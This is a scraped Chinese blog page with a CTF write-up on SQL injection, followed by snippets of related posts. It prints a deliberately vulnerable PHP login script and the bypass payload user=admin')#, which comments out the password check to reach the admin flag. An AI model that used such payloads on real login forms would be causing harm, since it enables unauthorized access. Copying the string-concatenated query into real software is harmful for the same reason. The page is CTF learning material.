2. 程式人生 > >SQL註入1

SQL註入1

阿新 發佈:2017-05-29
put com mysq secure name 字符 html mit rom 

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ‘:‘ . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)";
    echo ‘</br>‘.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
trim() 函數移除字符串兩側的空白字符或其他預定義字符。
例如本題雙引號裏面的都被解析了,所以不用閉合(帶雙引號)

技術分享

直接輸時是這種情況(發生了過濾)

所以我們直接註入

user=admin‘)#&pass=7321

只管user剩下的註釋掉

技術分享

Logged in! flag:nctf{ni_ye_hui_sql?}

SQL註入1
   
 
 
 
 

            
  

           

              
              

            

            
相關推薦

			   
            
            
            
 

    


    
    
SQL1

     
 put   com   mysq   secure   name   字符   html   mit   rom   <html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] & 



  
 

    


    
    
實驗吧    簡單的SQL1

     
 inf   ble   lag   nba   實驗   .sh   關鍵詞   報錯   union   解題鏈接: http://ctf5.shiyanbar.com/423/web/
解題思路:一,   輸入1,不報錯;輸入1‘,報錯;輸入1‘‘,不報錯。
二 ,   輸入1 and 1=1,返回1 



  
 

    


    
    
union的幾道ctf題,實驗吧簡單的sql1,2,這個看起來有點簡單和bugku的成績單

     
 需要   簡單   details   9.png   lmap   bug   輸入數據   php   接下來      這幾天在做CTF當中遇到了幾次sql註入都是union,寫篇博客記錄學習一下。
   首先推薦一篇文章“https://blog.csdn.net/Litbai_zhan 



  
 

    


    
    
Drupal V7.3.1 框架處理不當導致SQL

     
 literal   select   getc   十分   req   bar   databases   網絡   inf     這個漏洞本是2014年時候被人發現的,本著學習的目的,我來做個詳細的分析。漏洞雖然很早了,新版的Drupal甚至已經改變了框架的組織方式。但是絲毫不影響對於漏洞的分析。這是一 



  
 

    


    
    
sql學習筆記(1)

     
 筆記   err   variable   兩個   sch   二分法   當前   dir   返回   把學習到的sql註入的一點知識記錄下來
更改默認的sqlmap脫庫保存的路徑  --output-dir F:\
Substr(字符串,起始位置,字符數)   (初始為1不是0)
這裏有示例
http 



  
 

    


    
    
SQL之bWAPP之sqli_10-1.php

     
 sqli_10-1.phpSQL註入(AJAX/JSON/jQuery),需要知道ajax的作用,之前Google後,大概就流程是:當前頁提交的數據會先到ajax進行處理,然後在傳到服務器。這就需要使用burpsuit,可以看到抓包內容的referer項是當前網頁提交的內容,GET頭提交的是ajax處理後要發 



  
 

    


    
    
c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

     
 c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings>< 



  
 

    


    
    
SQL原理講解及防範

     
 ant   htm   part   無效   快樂   日常   field   users   lib   原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html
1.1.1 摘要
      日前,國內最大的程序員社區CSDN網站 



  
 

    


    
    
談談PHP網站的防SQL

     
 效果   query   數據庫服務   data   sqlite   nbsp   lds   esc   informix   SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W 



  
 

    


    
    
PDO防止SQL具體介紹

     
 取代   能夠   article   數據庫   bsp   什麽   幫助   用戶   機會   

<span style="font-size:18px;"><?php
$dbh = new PDO("mysql:host=localhost; dbname=demo", "use 



  
 

    


    
    
PHPCMS v9.6.0 wap模塊 SQL

     
 sed   injection   update   pytho   see   repl   nbsp   per   pre   調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。
由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行 



  
 

    


    
    
Joomla!3.7.0 Core SQL漏洞動態調試草稿

     
 src   cnblogs   phpstorm   prop   ets   legacy   gets   oom   users    
 
 
 
從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php

 
 

 
 調用父類的構造 



  
 

    


    
    
【EF框架】使用params參數傳值防止SQL報錯處理

     
 collect   oar   mapping   cnblogs   ken   datetime   nbsp   .com   src   通過SqlParameter傳時間參數,代碼如下:

                    var param = new List<SqlParamete 



  
 

    


    
    
另一種的SQL和DNS結合的技巧

     
 其中   where   ets   鏈接   是我   例如   .com   bar   導致   這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。
本文章是理解於:http://netsecurity.51cto.com/art/2015 



  
 

    


    
    
mysql防SQL搜集

     
 prepare   case when   sch   pass   字符   ble   失敗   sqli   16進制   SQL註入
例:腳本邏輯

$sql = “SELECT * FROM user WHERE userid = $_GET[userid] “;



案例1:SELECT * F 



  
 

    


    
    
Python防止sql

     
 pan   lec   posit   printf   osi   sqli   jet   usr   operation   看了網上文章,說的都挺好的,給cursor.execute傳遞格式串和參數,就能防止註入,但是我寫了代碼,卻死活跑不通,懷疑自己用了一個假的python   最後,發現原因可能是 



  
 

    


    
    
SQL之SQLmap入門

     
 訪問控制   ret   當前   輸入   手動   ati   取數據   shc   3.2   http://www.freebuf.com/articles/web/29942.html
 
簡介
    許多現實中對於網站的攻擊往往是由於網站沒有及時更新或者對於用戶的輸入沒有進行檢查。從緩沖區溢出 



  
 

    


    
    
防止sql的函數addslashes()

     
 php   null   str   ges   定義   echo   pre   註入   之前   
1 <?php
2 $str = addslashes(‘Shanghai is the "biggest" city in China.‘);
3 echo($str);
4 ?>

定義 



  
 

    


    
    
sqltips

     
 註釋   ctf   log   攔截   技術分享   執行   框架   哪裏   師傅   轉自http://www.wupco.cn/?p=3764
cuit
首先Web300 山水集團
第一步找到加密接口搭代理就不說了
接下來是註入,filter如下

這裏主要的難點在於如何按字節拆解返回的值,以完 



  
 

    


    
    
ADO.NET 占位符(防SQL 攻擊)

     
 microsoft   維護   text   conn   提前   輸入密碼   sql   密碼   ati   當在添加程序中註入攻擊時在控制臺應用程序中可以這樣寫:
請輸入編號:U006
請輸入用戶名:無敵
請輸入密碼:1234
請輸入昵稱:呵呵
請輸入性別:True
請輸入生日:2000-1-1